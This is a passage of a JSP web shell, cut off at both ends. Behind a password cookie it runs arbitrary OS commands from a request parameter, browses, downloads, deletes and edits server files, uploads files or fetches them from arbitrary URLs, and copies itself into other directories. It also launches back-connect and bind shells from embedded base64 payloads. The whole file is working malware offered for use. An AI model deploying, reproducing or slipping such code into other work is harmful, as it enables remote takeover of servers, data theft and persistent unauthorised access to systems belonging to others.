}
|
||
|
StringBuffer ret = new StringBuffer();
|
||
|
long start = System.currentTimeMillis();
|
||
|
try {
|
||
|
Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(cwd));
|
||
|
//Get input and error streams
|
||
|
BufferedInputStream ls_in = new BufferedInputStream(ls_proc.getInputStream());
|
||
|
BufferedInputStream ls_err = new BufferedInputStream(ls_proc.getErrorStream());
|
||
|
boolean end = false;
|
||
|
while (!end) {
|
||
|
int c = 0;
|
||
|
while ((ls_err.available() > 0) && (++c <= 1000)) {
|
||
|
ret.append((char) ls_err.read());
|
||
|
}
|
||
|
c = 0;
|
||
|
while ((ls_in.available() > 0) && (++c <= 1000)) {
|
||
|
ret.append((char) ls_in.read());
|
||
|
}
|
||
|
try {
|
||
|
ls_proc.exitValue();
|
||
|
//if the process has not finished, an exception is thrown
|
||
|
//else
|
||
|
while (ls_err.available() > 0)
|
||
|
ret.append((char) ls_err.read());
|
||
|
while (ls_in.available() > 0)
|
||
|
ret.append((char) ls_in.read());
|
||
|
end = true;
|
||
|
}
|
||
|
catch (IllegalThreadStateException ex) {
|
||
|
//Process is running
|
||
|
}
|
||
|
try {
|
||
|
Thread.sleep(50);
|
||
|
}
|
||
|
catch (InterruptedException ie) {}
|
||
|
}
|
||
|
}
|
||
|
catch (IOException e) {
|
||
|
ret.append("Error: " + e);
|
||
|
}
|
||
|
return ret.toString();
|
||
|
}
|
||
|
public String xdir(String fdir){
|
||
|
String path = xcleanpath(urldecode(fdir));
|
||
|
StringBuffer buff = new StringBuffer("");
|
||
|
if(is_dir(path)){
|
||
|
File mypath = new File(fdir);
|
||
|
ArrayList fname = new ArrayList();
|
||
|
ArrayList dname = new ArrayList();
|
||
|
|
||
|
String[] allitem = mypath.list();
|
||
|
for(int i=0;i<allitem.length;i++){
|
||
|
String checkthis = allitem[i].toString();
|
||
|
if(is_dir(path + checkthis)){
|
||
|
dname.add(checkthis);
|
||
|
}
|
||
|
else{
|
||
|
fname.add(checkthis);
|
||
|
}
|
||
|
}
|
||
|
Collections.sort(fname, new myComparator());
|
||
|
Collections.sort(dname, new myComparator());
|
||
|
|
||
|
buff.append("<div id=\"explorer\"><table class=\"tblExplorer\">" +
|
||
|
"<tr><th>Filename</th>" +
|
||
|
"<th style=\"width:80px;\">Filesize</th>" +
|
||
|
"<th style=\"width:80px;\">Permission</th>" +
|
||
|
"<th style=\"width:150px;\">Last Modified</th>" +
|
||
|
"<th style=\"width:180px;\">Action</th></tr>");
|
||
|
|
||
|
if (path.length() > 3){
|
||
|
String sd = ".";
|
||
|
String d = xcleanpath(path);
|
||
|
String nextdir = xcleanpath(xparentfolder(d));
|
||
|
buff.append("<tr onmouseover=\"this.style.cursor='pointer';this.style.cursor='hand';\" onclick=\"window.location= '?dir=" + urlencode(d) + "';\">");
|
||
|
buff.append("<td><span style=\"font-weight:bold;\"><a href=\"?dir=" + d + "\">[</span> "+ sd + " <span style=\"font-weight:bold;\">]</span></a></td>");
|
||
|
buff.append("<td>DIR</td>");
|
||
|
buff.append("<td style=\"text-align:center;\">" + xfileperms(d) + "</td>");
|
||
|
buff.append("<td style=\"text-align:center;\">" + xfilelastmodified(d) + "</td>");
|
||
|
buff.append("<td style=\"text-align:center;\"><a href=\"?dir=" + path + "&properties=" + d + "\">Properties</a> | <a href=\"?dir=" + nextdir + "&del=" + d + "\">Remove</a></td>");
|
||
|
buff.append("</tr>");
|
||
|
sd = "..";
|
||
|
d = xcleanpath(xparentfolder(path));
|
||
|
nextdir = xcleanpath(xparentfolder(d));
|
||
|
buff.append("<tr onmouseover=\"this.style.cursor='pointer';this.style.cursor='hand';\" onclick=\"window.location= '?dir=" + urlencode(d) + "';\">");
|
||
|
buff.append("<td><span style=\"font-weight:bold;\"><a href=\"?dir=" + d + "\">[</span> "+ sd + " <span style=\"font-weight:bold;\">]</span></a></td>");
|
||
|
buff.append("<td>DIR</td>");
|
||
|
buff.append("<td style=\"text-align:center;\">" + xfileperms(d) + "</td>");
|
||
|
buff.append("<td style=\"text-align:center;\">" + xfilelastmodified(d) + "</td>");
|
||
|
buff.append("<td style=\"text-align:center;\"><a href=\"?dir=" + d + "&properties=" + d + "\">Properties</a> | <a href=\"?dir=" + nextdir + "&del=" + d + "\">Remove</a></td>");
|
||
|
buff.append("</tr>");
|
||
|
}
|
||
|
for(int i=0;i<dname.size();i++){
|
||
|
String sd = dname.get(i).toString().trim().replace("\\","\\\\");
|
||
|
String d = path + sd.trim();
|
||
|
String nextdir = xcleanpath(d);
|
||
|
buff.append("<tr onmouseover=\"this.style.cursor='pointer';this.style.cursor='hand';\" onclick=\"window.location= '?dir=" + urlencode(nextdir) + "';\">");
|
||
|
buff.append("<td><span style=\"font-weight:bold;\"><a href=\"?dir=" + nextdir + "\">[</span> "+ sd + " <span style=\"font-weight:bold;\">]</span></a></td>");
|
||
|
buff.append("<td>DIR</td>");
|
||
|
buff.append("<td style=\"text-align:center;\">" + xfileperms(nextdir) + "</td>");
|
||
|
buff.append("<td style=\"text-align:center;\">" + xfilelastmodified(nextdir) + "</td>");
|
||
|
buff.append("<td style=\"text-align:center;\"><a href=\"?dir=" + path + "&properties=" + nextdir + "\">Properties</a> | <a href=\"?dir=" + path + "&del=" + xcleanpath(nextdir) + "\">Remove</a></td>");
|
||
|
buff.append("</tr>");
|
||
|
}
|
||
|
for(int i=0;i<fname.size();i++){
|
||
|
String sf = fname.get(i).toString().trim();
|
||
|
String f = path + sf;
|
||
|
String view = "?dir=" + urlencode(path) + "&view=" + urlencode(f);
|
||
|
buff.append("<tr onmouseover=\"this.style.cursor='pointer';this.style.cursor='hand';\" onclick=\"window.location='?dir=" + urlencode(xcleanpath(path)) + "&properties=" + urlencode(f) + "';\"><td>");
|
||
|
buff.append("<a href=\"?dir=" + urlencode(xcleanpath(path)) + "&properties=" + urlencode(f) + "\">");
|
||
|
buff.append(sf + "</a></td>");
|
||
|
buff.append("<td>" + xparsefilesize(xfilesize(f)) + "</td>");
|
||
|
buff.append("<td style=\"text-align:center;\">" + xfileperms(f) + "</td>");
|
||
|
buff.append("<td style=\"text-align:center;\">" + xfilelastmodified(f) + "</td>");
|
||
|
buff.append("<td style=\"text-align:center;\"><a href=\"" + view + "\">Edit</a> | <a href=\"?get=" + f + "\">Download</a> | <a href=\"?dir=" + xcleanpath(path) + "&del=" + f + "\">Remove</a></td>");
|
||
|
buff.append("</tr>");
|
||
|
}
|
||
|
buff.append("</table></div>");
|
||
|
}
|
||
|
return buff.toString();
|
||
|
}
|
||
|
public boolean is_numeric(String str){
|
||
|
return str.matches("\\d+");
|
||
|
}
|
||
|
public void chdir(String directory) {
|
||
|
System.setProperty("user.dir",directory);
|
||
|
}
|
||
|
public byte[] b64decode(String str){
|
||
|
BASE64Decoder myDec = new BASE64Decoder();
|
||
|
byte[] decoded = null;
|
||
|
try{ decoded = myDec.decodeBuffer(str); }
|
||
|
catch(Exception e){ }
|
||
|
return decoded;
|
||
|
}
|
||
|
public String htmlspecialchars(String scode){
|
||
|
StringBuffer sb = new StringBuffer();
|
||
|
for(int i=0; i<scode.length(); i++) {
|
||
|
char c = scode.charAt(i);
|
||
|
switch (c) {
|
||
|
case '<' :sb.append("<");break;
|
||
|
case '>' :sb.append(">");break;
|
||
|
case '&' :sb.append("&");break;
|
||
|
case '"' :sb.append(""");break;
|
||
|
case '\'' :sb.append("'");break;
|
||
|
case ' ' :sb.append(" ");break;
|
||
|
default :sb.append(c);
|
||
|
}
|
||
|
}
|
||
|
return sb.toString();
|
||
|
}
|
||
|
public boolean is_image(String fpath){
|
||
|
FileNameMap fileNameMap = URLConnection.getFileNameMap();
|
||
|
String contentType = fileNameMap.getContentTypeFor(fpath);
|
||
|
if(contentType!=null && contentType.toLowerCase().startsWith("image")){ return true; }
|
||
|
return false;
|
||
|
}
|
||
|
class myComparator implements Comparator {
|
||
|
public int compare(Object o1, Object o2) {
|
||
|
String s1 = (String) o1;
|
||
|
String s2 = (String) o2;
|
||
|
return s1.toLowerCase().compareTo(s2.toLowerCase());
|
||
|
}
|
||
|
}
|
||
|
public class FileInfo {
|
||
|
public String name = null, clientFileName = null, fileContentType = null;
|
||
|
private byte[] fileContents = null;
|
||
|
public File file = null;
|
||
|
public StringBuffer sb = new StringBuffer(100);
|
||
|
|
||
|
public void setFileContents(byte[] aByteArray) {
|
||
|
fileContents = new byte[aByteArray.length];
|
||
|
System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
|
||
|
}
|
||
|
}
|
||
|
public class HttpMultiPartParser {
|
||
|
//private final String lineSeparator = System.getProperty("line.separator", "\n");
|
||
|
private final int ONE_MB = 1024 * 1;
|
||
|
|
||
|
public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
|
||
|
int clength) throws IllegalArgumentException, IOException {
|
||
|
if (is == null) throw new IllegalArgumentException("InputStream");
|
||
|
if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
|
||
|
"\"" + boundary + "\" is an illegal boundary indicator");
|
||
|
boundary = "--" + boundary;
|
||
|
StringTokenizer stLine = null, stFields = null;
|
||
|
FileInfo fileInfo = null;
|
||
|
Hashtable dataTable = new Hashtable(5);
|
||
|
String line = null, field = null, paramName = null;
|
||
|
boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
|
||
|
boolean isFile = false;
|
||
|
if (saveFiles) { // Create the required directory (including parent dirs)
|
||
|
File f = new File(saveInDir);
|
||
|
f.mkdirs();
|
||
|
}
|
||
|
line = getLine(is);
|
||
|
if (line == null || !line.startsWith(boundary)) throw new IOException(
|
||
|
"Boundary not found; boundary = " + boundary + ", line = " + line);
|
||
|
while (line != null) {
|
||
|
if (line == null || !line.startsWith(boundary)) return dataTable;
|
||
|
line = getLine(is);
|
||
|
if (line == null) return dataTable;
|
||
|
stLine = new StringTokenizer(line, ";\r\n");
|
||
|
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
|
||
|
"Bad data in second line");
|
||
|
line = stLine.nextToken().toLowerCase();
|
||
|
if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
|
||
|
"Bad data in second line");
|
||
|
stFields = new StringTokenizer(stLine.nextToken(), "=\"");
|
||
|
if (stFields.countTokens() < 2) throw new IllegalArgumentException(
|
||
|
"Bad data in second line");
|
||
|
fileInfo = new FileInfo();
|
||
|
stFields.nextToken();
|
||
|
paramName = stFields.nextToken();
|
||
|
isFile = false;
|
||
|
if (stLine.hasMoreTokens()) {
|
||
|
field = stLine.nextToken();
|
||
|
stFields = new StringTokenizer(field, "=\"");
|
||
|
if (stFields.countTokens() > 1) {
|
||
|
if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
|
||
|
fileInfo.name = paramName;
|
||
|
String value = stFields.nextToken();
|
||
|
if (value != null && value.trim().length() > 0) {
|
||
|
fileInfo.clientFileName = value;
|
||
|
isFile = true;
|
||
|
}
|
||
|
else {
|
||
|
line = getLine(is); // Skip "Content-Type:" line
|
||
|
line = getLine(is); // Skip blank line
|
||
|
line = getLine(is); // Skip blank line
|
||
|
line = getLine(is); // Position to boundary line
|
||
|
continue;
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
else if (field.toLowerCase().indexOf("filename") >= 0) {
|
||
|
line = getLine(is); // Skip "Content-Type:" line
|
||
|
line = getLine(is); // Skip blank line
|
||
|
line = getLine(is); // Skip blank line
|
||
|
line = getLine(is); // Position to boundary line
|
||
|
continue;
|
||
|
}
|
||
|
}
|
||
|
boolean skipBlankLine = true;
|
||
|
if (isFile) {
|
||
|
line = getLine(is);
|
||
|
if (line == null) return dataTable;
|
||
|
if (line.trim().length() < 1) skipBlankLine = false;
|
||
|
else {
|
||
|
stLine = new StringTokenizer(line, ": ");
|
||
|
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
|
||
|
"Bad data in third line");
|
||
|
stLine.nextToken(); // Content-Type
|
||
|
fileInfo.fileContentType = stLine.nextToken();
|
||
|
}
|
||
|
}
|
||
|
if (skipBlankLine) {
|
||
|
line = getLine(is);
|
||
|
if (line == null) return dataTable;
|
||
|
}
|
||
|
if (!isFile) {
|
||
|
line = getLine(is);
|
||
|
if (line == null) return dataTable;
|
||
|
dataTable.put(paramName, line);
|
||
|
// If parameter is dir, change saveInDir to dir
|
||
|
if (paramName.equals("dir")) saveInDir = line;
|
||
|
line = getLine(is);
|
||
|
continue;
|
||
|
}
|
||
|
try {
|
||
|
OutputStream os = null;
|
||
|
String path = null;
|
||
|
if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
|
||
|
fileInfo.clientFileName));
|
||
|
else os = new ByteArrayOutputStream(ONE_MB);
|
||
|
boolean readingContent = true;
|
||
|
byte previousLine[] = new byte[2 * ONE_MB];
|
||
|
byte temp[] = null;
|
||
|
byte currentLine[] = new byte[2 * ONE_MB];
|
||
|
int read, read3;
|
||
|
if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
|
||
|
line = null;
|
||
|
break;
|
||
|
}
|
||
|
while (readingContent) {
|
||
|
if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
|
||
|
line = null;
|
||
|
break;
|
||
|
}
|
||
|
if (compareBoundary(boundary, currentLine)) {
|
||
|
os.write(previousLine, 0, read - 2);
|
||
|
line = new String(currentLine, 0, read3);
|
||
|
break;
|
||
|
}
|
||
|
else {
|
||
|
os.write(previousLine, 0, read);
|
||
|
temp = currentLine;
|
||
|
currentLine = previousLine;
|
||
|
previousLine = temp;
|
||
|
read = read3;
|
||
|
}//end else
|
||
|
}//end while
|
||
|
os.flush();
|
||
|
os.close();
|
||
|
if (!saveFiles) {
|
||
|
ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
|
||
|
fileInfo.setFileContents(baos.toByteArray());
|
||
|
}
|
||
|
else fileInfo.file = new File(path);
|
||
|
dataTable.put(paramName, fileInfo);
|
||
|
}//end try
|
||
|
catch (IOException e) {
|
||
|
throw e;
|
||
|
}
|
||
|
}
|
||
|
return dataTable;
|
||
|
}
|
||
|
|
||
|
/**
|
||
|
* Compares boundary string to byte array
|
||
|
*/
|
||
|
private boolean compareBoundary(String boundary, byte ba[]) {
|
||
|
if (boundary == null || ba == null) return false;
|
||
|
for (int i = 0; i < boundary.length(); i++)
|
||
|
if ((byte) boundary.charAt(i) != ba[i]) return false;
|
||
|
return true;
|
||
|
}
|
||
|
|
||
|
/** Convenience method to read HTTP header lines */
|
||
|
private synchronized String getLine(ServletInputStream sis) throws IOException {
|
||
|
byte b[] = new byte[1024];
|
||
|
int read = sis.readLine(b, 0, b.length), index;
|
||
|
String line = null;
|
||
|
if (read != -1) {
|
||
|
line = new String(b, 0, read);
|
||
|
if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
|
||
|
}
|
||
|
return line;
|
||
|
}
|
||
|
|
||
|
public String getFileName(String dir, String fileName) throws IllegalArgumentException {
|
||
|
String path = null;
|
||
|
if (dir == null || fileName == null) throw new IllegalArgumentException(
|
||
|
"dir or fileName is null");
|
||
|
int index = fileName.lastIndexOf('/');
|
||
|
String name = null;
|
||
|
if (index >= 0) name = fileName.substring(index + 1);
|
||
|
else name = fileName;
|
||
|
index = name.lastIndexOf('\\');
|
||
|
if (index >= 0) fileName = name.substring(index + 1);
|
||
|
path = dir + File.separator + fileName;
|
||
|
if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
|
||
|
else return path.replace('/', File.separatorChar);
|
||
|
}
|
||
|
} //End of class HttpMultiPartParser
|
||
|
|
||
|
Hashtable cookieTable(Cookie[] cookies) {
|
||
|
Hashtable cookieTable = new Hashtable();
|
||
|
if (cookies != null) {
|
||
|
for (int i=0; i < cookies.length; i++)
|
||
|
cookieTable.put(cookies[i].getName(), cookies[i].getValue());
|
||
|
}
|
||
|
return cookieTable;
|
||
|
}
|
||
|
|
||
|
%><%
|
||
|
//################# INIT GOES HERE #######################==================================================]
|
||
|
//String xCwd_ = getServletConfig().getServletContext().getRealPath(request.getRequestURI());
|
||
|
String xCwd_ = getServletConfig().getServletContext().getRealPath(request.getRequestURI());
|
||
|
String xCwd = xCwd_.substring(0,xCwd_.lastIndexOf(getSlash()));
|
||
|
chdir(xCwd);
|
||
|
|
||
|
String result = "";
|
||
|
String check = "";
|
||
|
Hashtable _COOKIE = cookieTable(request.getCookies());
|
||
|
Cookie myCookie;
|
||
|
boolean auth = false;
|
||
|
if((request.getParameter("passw")!=null) && (!request.getParameter("passw").equals(""))){
|
||
|
check = request.getParameter("passw").trim();
|
||
|
if(check.equals(shell_password)){
|
||
|
myCookie = new Cookie("pass",check);
|
||
|
myCookie.setMaxAge(3600*24*7);
|
||
|
response.addCookie(myCookie);
|
||
|
}
|
||
|
else {
|
||
|
myCookie = new Cookie("pass","");
|
||
|
myCookie.setMaxAge(0);
|
||
|
response.addCookie(myCookie);
|
||
|
}
|
||
|
}
|
||
|
if(_COOKIE.containsKey("pass")) {
|
||
|
check = (String) _COOKIE.get("pass");
|
||
|
}
|
||
|
|
||
|
if(check.equals(shell_password)){
|
||
|
auth = true;
|
||
|
}
|
||
|
else auth = false;
|
||
|
|
||
|
|
||
|
if((request.getParameter("img")!=null) && (!request.getParameter("img").equals(""))){
|
||
|
String myfile = request.getParameter("img");
|
||
|
if(is_file(myfile)){
|
||
|
response.setContentType("image/png");
|
||
|
OutputStream o = response.getOutputStream();
|
||
|
FileInputStream fis = new FileInputStream(myfile);
|
||
|
int i;
|
||
|
while ((i=fis.read()) != -1){ o.write(i); }
|
||
|
fis.close();
|
||
|
o.flush();
|
||
|
o.close();
|
||
|
return;
|
||
|
}
|
||
|
else{
|
||
|
String file = "";
|
||
|
if(myfile.equals("icon")){
|
||
|
file = icon;
|
||
|
}
|
||
|
else if(myfile.equals("bg")){
|
||
|
file = bg;
|
||
|
}
|
||
|
byte[] data = b64decode(file);
|
||
|
response.setContentType("image/png");
|
||
|
OutputStream o = response.getOutputStream();
|
||
|
o.write(data);
|
||
|
o.flush();
|
||
|
o.close();
|
||
|
return;
|
||
|
}
|
||
|
}
|
||
|
if((request.getParameter("get")!=null) && (!request.getParameter("get").equals(""))){
|
||
|
String myfile = request.getParameter("get");
|
||
|
File myfile__ = new File(myfile);
|
||
|
response.setContentType("application/octet-stream");
|
||
|
response.setHeader("Content-Disposition","attachment; filename=\"" + myfile__.getName() + "\"");
|
||
|
OutputStream o = response.getOutputStream();
|
||
|
FileInputStream fis = new FileInputStream(myfile);
|
||
|
int i;
|
||
|
while ((i=fis.read()) != -1){ o.write(i); }
|
||
|
fis.close();o.flush();o.close();
|
||
|
return;
|
||
|
}
|
||
|
|
||
|
|
||
|
if((request.getParameter("dir")!=null) && (!request.getParameter("dir").equals(""))){
|
||
|
String newdir = xcleanpath(urldecode(request.getParameter("dir").trim()));
|
||
|
if((request.getParameter("oldfilename")!=null) && (!request.getParameter("oldfilename").equals(""))){
|
||
|
if((request.getParameter("properties")!=null) && (!request.getParameter("properties").equals(""))){
|
||
|
newdir = xcleanpath(xparentfolder(request.getParameter("oldfilename")));
|
||
|
}
|
||
|
}
|
||
|
if(is_dir(newdir)){
|
||
|
chdir(newdir);
|
||
|
xCwd = newdir;
|
||
|
}
|
||
|
else if(is_file(newdir)){
|
||
|
newdir = newdir.substring(0,newdir.lastIndexOf(getSlash()));
|
||
|
if(is_dir(newdir)){
|
||
|
chdir(newdir);
|
||
|
xCwd = newdir;
|
||
|
}
|
||
|
}
|
||
|
|
||
|
if((request.getParameter("foldername")!=null) && (!request.getParameter("foldername").equals(""))){
|
||
|
File myFile = new File(xcleanpath(xCwd + request.getParameter("foldername")));
|
||
|
if(!myFile.exists()) myFile.mkdir();
|
||
|
}
|
||
|
else if((request.getParameter("del")!=null) && (!request.getParameter("del").equals(""))){
|
||
|
String fdel = request.getParameter("del");
|
||
|
if(is_file(fdel)) new File(fdel).delete();
|
||
|
else if(is_dir(fdel)){
|
||
|
xrmdir(fdel);
|
||
|
xCwd = xcleanpath(newdir);
|
||
|
}
|
||
|
}
|
||
|
else if((request.getParameter("childname")!=null) && (!request.getParameter("childname").equals(""))){
|
||
|
String childname = request.getParameter("childname").trim();
|
||
|
String ortu = getServletConfig().getServletContext().getRealPath(request.getRequestURI());
|
||
|
String con = xfileopen(ortu);
|
||
|
xfilesave(xCwd+childname,con);
|
||
|
}
|
||
|
}
|
||
|
|
||
|
if((request.getParameter("btnConnect")!=null) && (!request.getParameter("btnConnect").equals(""))){
|
||
|
if((request.getParameter("bportC")!=null) && (is_numeric(request.getParameter("bportC")))){
|
||
|
String port = request.getParameter("bportC");
|
||
|
String base64 = "";
|
||
|
if(is_win()) base64 = wBind;
|
||
|
else base64 = xBack;
|
||
|
if(xrunexploit(xCwd,base64,port,request.getRemoteAddr())){
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
else if((request.getParameter("btnListen")!=null) && (!request.getParameter("btnListen").equals(""))){
|
||
|
if((request.getParameter("lportC")!=null) && (is_numeric(request.getParameter("lportC")))){
|
||
|
String port = request.getParameter("lportC");
|
||
|
String base64 = "";
|
||
|
if(is_win()) base64 = wBind;
|
||
|
else base64 = xBind;
|
||
|
if(xrunexploit(xCwd,base64,port,"")){
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
|
||
|
|
||
|
|
||
|
if ((request.getContentType() != null) && (request.getContentType().toLowerCase().startsWith("multipart"))) {
|
||
|
HttpMultiPartParser myParser = new HttpMultiPartParser();
|
||
|
try{
|
||
|
int bstart = request.getContentType().lastIndexOf("oundary=");
|
||
|
String bound = request.getContentType().substring(bstart + 8);
|
||
|
int clength = request.getContentLength();
|
||
|
Hashtable ht = myParser.processData(request.getInputStream(), bound, xCwd, clength);
|
||
|
if(ht.get("btnNewUploadUrl")!=null && !ht.get("btnNewUploadUrl").equals("")){
|
||
|
if(ht.get("fileurl")!=null && !ht.get("fileurl").equals("")){
|
||
|
URL myUrl = new URL(ht.get("fileurl").toString());
|
||
|
URLConnection myCon = myUrl.openConnection();
|
||
|
int conLength = myCon.getContentLength();
|
||
|
InputStream raw = myCon.getInputStream();
|
||
|
InputStream in = new BufferedInputStream(raw);
|
||
|
byte[] data = new byte[conLength];
|
||
|
int bytesRead = 0;
|
||
|
int offset = 0;
|
||
|
while(offset < conLength){
|
||
|
bytesRead = in.read(data, offset, data.length - offset);
|
||
|
if(bytesRead == -1) break;
|
||
|
offset += bytesRead;
|
||
|
}
|
||
|
in.close();
|
||
|
if(offset == conLength){
|
||
|
String fname = myUrl.getFile();
|
||
|
fname = fname.substring(fname.lastIndexOf('/')+1);
|
||
|
if(ht.get("filename")!=null && !ht.get("filename").equals("")){
|
||
|
fname = ht.get("filename").toString().trim();
|
||
|
}
|
||
|
FileOutputStream ooo = new FileOutputStream(xCwd + fname);
|
||
|
ooo.write(data);ooo.flush();ooo.close();
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
else if(ht.get("btnNewUploadLocal")!=null && !ht.get("btnNewUploadLocal").equals("")){
|
||
|
FileInfo fi = (FileInfo) ht.get("filelocal");
|
||
|
String clientFileName = xCwd + fi.clientFileName.trim();
|
||
|
if(ht.get("filename")!=null && !ht.get("filename").equals("")){
|
||
|
String filename = xCwd + ht.get("filename").toString().trim();
|
||
|
File clientFile = new File(clientFileName);
|
||
|
clientFile.renameTo(new File(filename));
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
catch(Exception e){ }
|
||
|
}
|
||
|
|
||
|
if((request.getParameter("cmd")!=null) && (!request.getParameter("cmd").equals(""))){
|
||
|
String cmd = urldecode(request.getParameter("cmd"));
|
||
|
String newdir = "";
|
||
|
if(cmd.toLowerCase().startsWith("cd ")){
|
||
|
newdir = cmd.substring(3).trim();
|
||
|
if(is_win()) newdir = newdir.replace("/","\\");
|
||
|
if(newdir.equals("\\") && xCwd.length()>=3){ xCwd = xCwd.substring(0,3); }
|
||
|
else if(newdir.equals(".")) { }
|
||
|
else if(newdir.equals("..")) {
|
||
|
xCwd = xcleanpath(xparentfolder(xCwd));
|
||
|
}
|
||
|
else{
|
||
|
if(newdir.indexOf(":") > 0){
|
||
|
if(is_dir(newdir)){ xCwd = xcleanpath(newdir); }
|
||
|
}
|
||
|
else if(is_dir(newdir)){
|
||
|
xCwd = xcleanpath(newdir);
|
||
|
}
|
||
|
else{
|
||
|
if(is_dir(xCwd + newdir)) { xCwd = xcleanpath(xCwd + newdir); }
|
||
|
}
|
||
|
}
|
||
|
result = xdir(xCwd);
|
||
|
}
|
||
|
else if(cmd.matches("^\\w{1}:.*")){
|
||
|
if(is_dir(cmd)){ xCwd = xcleanpath(cmd); }
|
||
|
result = xdir(xCwd);
|
||
|
}
|
||
|
else {
|
||
|
String result_ = htmlspecialchars(ekse(cmd,xCwd));
|
||
|
if(!result_.equals("")) result = result_.replace("\n","<br />");
|
||
|
else {
|
||
|
result = xdir(xCwd);
|
||
|
}
|
||
|
}
|
||
|
chdir(xCwd);
|
||
|
}
|
||
|
else if((request.getParameter("properties")!=null) && (!request.getParameter("properties").equals(""))){
|
||
|
String fname = xcleanpath(urldecode(request.getParameter("properties")));
|
||
|
String oldname = "";
|
||
|
if((request.getParameter("oldfilename")!=null) && (!request.getParameter("oldfilename").equals(""))){
|
||
|
oldname = request.getParameter("oldfilename");
|
||
|
File oldfile = new File(oldname);
|
||
|
oldfile.renameTo(new File(fname));
|
||
|
}
|
||
|
String dir = xCwd;
|
||
|
String fcont = "";
|
||
|
String fview = "";
|
||
|
String fsize = "";
|
||
|
String faction = "";
|
||
|
String type = "";
|
||
|
if(is_dir(fname)){
|
||
|
fsize = "DIR";
|
||
|
fcont = xdir(fname);
|
||
|
faction = "<a href=\"?dir=" + xcleanpath(fname) + "&properties=" + xcleanpath(fname) + "\">Properties</a> | <a href=\"?dir=" + xcleanpath(xparentfolder(fname)) + "&del=" + xcleanpath(fname) + "\">Remove</a>";
|
||
|
}
|
||
|
else{
|
||
|
fsize = xparsefilesize(xfilesize(fname)) + " <span class=\"gaul\">( </span>" + xfilesize(fname) + " bytes<span class=\"gaul\"> )</span>";
|
||
|
if((request.getParameter("type")!=null) && (!request.getParameter("type").equals(""))) type = request.getParameter("type").trim();
|
||
|
else{
|
||
|
if(is_image(fname)) type = "img";
|
||
|
else type = "text";
|
||
|
}
|
||
|
if(type.equals("img")){
|
||
|
String imglink = "<p><a href=\"?img=" + fname + "\" target=\"_blank\"><span class=\"gaul\">[ </span>view full size<span class=\"gaul\"> ]</span></a></p>";
|
||
|
fcont = "<div style=\"text-align:center;width:100%;\">" + imglink + "<img width=\"800\" src=\"?img=" + fname + "\" alt=\"\" style=\"margin:8px auto;padding:0;border:0;\" /></div>";
|
||
|
}
|
||
|
else{
|
||
|
String code = htmlspecialchars(xfileopen(fname));
|
||
|
fcont = "<div class=\"boxcode\">" + code.replace("\n","<br />") + "</div>";
|
||
|
}
|
||
|
|
||
|
faction = "<a href=\"?dir=" + xcleanpath(dir) + "&view=" + fname + "\">Edit</a> | <a href=\"?get=" + fname + "\">Download</a> | <a href=\"?dir=" + xcleanpath(dir) + "&del=" + fname + "\">Remove</a>";
|
||
|
fview = "<a href=\"?dir=" + xcleanpath(dir) + "&properties=" + fname + "&type=text\"><span class=\"gaul\">[ </span>text<span class=\"gaul\"> ]</span></a><a href=\"?dir=" + xcleanpath(dir) + "&properties=" + fname + "&type=img\"><span class=\"gaul\">[ </span>image<span class=\"gaul\"> ]</span></a>";
|
||
|
}
|
||
|
String fperm = xfileperms(fname);
|
||
|
String filemtime = xfilelastmodified(fname);
|
||
|
result = "<div style=\"display:inline;\">" +
|
||
|
"<form action=\"?\" method=\"get\" style=\"margin:0;padding:1px 8px;text-align:left;\">" +
|
||
|
"<input type=\"hidden\" name=\"dir\" value=\"" + dir + "\" />" +
|
||
|
"<input type=\"hidden\" name=\"oldfilename\" value=\"" + fname + "\" />" + faction + " | " +
|
||
|
"<span><input style=\"width:50%;\" type=\"text\" name=\"properties\" value=\"" + fname + "\" />" +
|
||
|
" <input style=\"width:120px\" class=\"btn\" type=\"submit\" name=\"btnRename\" value=\"Rename\" />" +
|
||
|
"</span>" +
|
||
|
"<div class=\"fprop\">" +
|
||
|
"Size = " + fsize + "<br />" +
|
||
|
"Permission = <span class=\"gaul\">( </span>" + fperm + "<span class=\"gaul\"> )</span><br />" +
|
||
|
"Last Modified = <span class=\"gaul\">( </span>" + filemtime + "<span class=\"gaul\"> )</span><br />" +
|
||
|
fview + "</div>" + fcont + "</form></div>";
|
||
|
}
|
||
|
else if(((request.getParameter("view")!=null) && (!request.getParameter("view").equals(""))) || ((request.getParameter("filename")!=null) && (!request.getParameter("filename").equals("")))){
|
||
|
String mymsg = "";
|
||
|
String pesan = "";
|
||
|
String fpath = "";
|
||
|
boolean dos = false;
|
||
|
if((request.getParameter("save")!=null) && (!request.getParameter("save").equals(""))){
|
||
|
if((request.getParameter("dos")!=null) && (request.getParameter("dos").equals("true"))){ dos = true; }
|
||
|
String saveas = request.getParameter("saveas");
|
||
|
BufferedWriter outs = new BufferedWriter(new FileWriter(saveas));
|
||
|
StringReader text = new StringReader(request.getParameter("filesource"));
|
||
|
int i;
|
||
|
boolean cr = false;
|
||
|
String lineend = "\n";
|
||
|
if (dos) lineend = "\r\n";
|
||
|
while ((i = text.read()) >= 0) {
|
||
|
if (i == '\r') cr = true;
|
||
|
else if (i == '\n') {
|
||
|
outs.write(lineend);
|
||
|
cr = false;
|
||
|
}
|
||
|
else if (cr) {
|
||
|
outs.write(lineend);
|
||
|
cr = false;
|
||
|
}
|
||
|
else {
|
||
|
outs.write(i);
|
||
|
cr = false;
|
||
|
}
|
||
|
}
|
||
|
outs.flush();
|
||
|
outs.close();
|
||
|
|
||
|
if(is_file(saveas)) pesan = "File Saved";
|
||
|
